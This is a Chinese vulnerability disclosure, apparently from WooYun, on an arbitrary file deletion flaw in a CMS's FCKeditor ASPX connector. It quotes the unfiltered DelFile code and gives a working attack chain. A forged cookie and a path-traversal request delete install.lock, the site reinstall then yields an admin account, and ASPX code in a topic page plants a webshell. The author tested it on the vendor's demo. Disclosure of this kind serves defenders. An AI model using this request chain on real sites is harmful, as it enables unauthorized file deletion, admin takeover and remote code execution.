在上个漏洞wooyun-2014-061609中,我提到了FCK编辑器可以绕过的问题,但是只是用来列目录,查看代码,我发现它还可以删除任意文件,没有过滤。

if (text5 == "DelFile") {

this.GrIdOC5LQ(xmlNode, text, text2);

}

path = current.Server.MapPath(current.Request["FileUrl"]);

flag = !File.Exists(path);

if (flag) 

mLl4TDlFjua8ECRxcG.aHPyXJTts(base.Response, 1, " unable to locate file ");

else

File.Delete(path);

系统安装文件/e/install/index.aspx检测了/e/install/install.lock是否存在

如果不存在的话,就可以重装网站,所以我们就可以用这个漏洞删除掉install.lock文件。

首先把Cookie改成 Master=1&UID=9999&Valicate=17b62103fec08a1333215b141bb18217f11c8e13a

然后访问/e/incs/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=DelFile&Type=File&CurrentFolder=&FileUrl=../../../../../../install/install.lock

这样就删掉了install.lock,然后访问/e/install/,这里可以直接修改管理员密码,或者执行sql添加管理员账号。

a1.png


a2.png

漏洞证明:

这里拿官方DEMO测试一下。

删文件+添加用户

a3.png



用户名test,密码admin

登陆后台,点增加专题,专题内容里面写ASPX代码,就可以拿shell了

x4.png



添加后,用专题管理,找到专题,访问一下,shell就生成好了,地址是/e/zt/xx.aspx

x5.png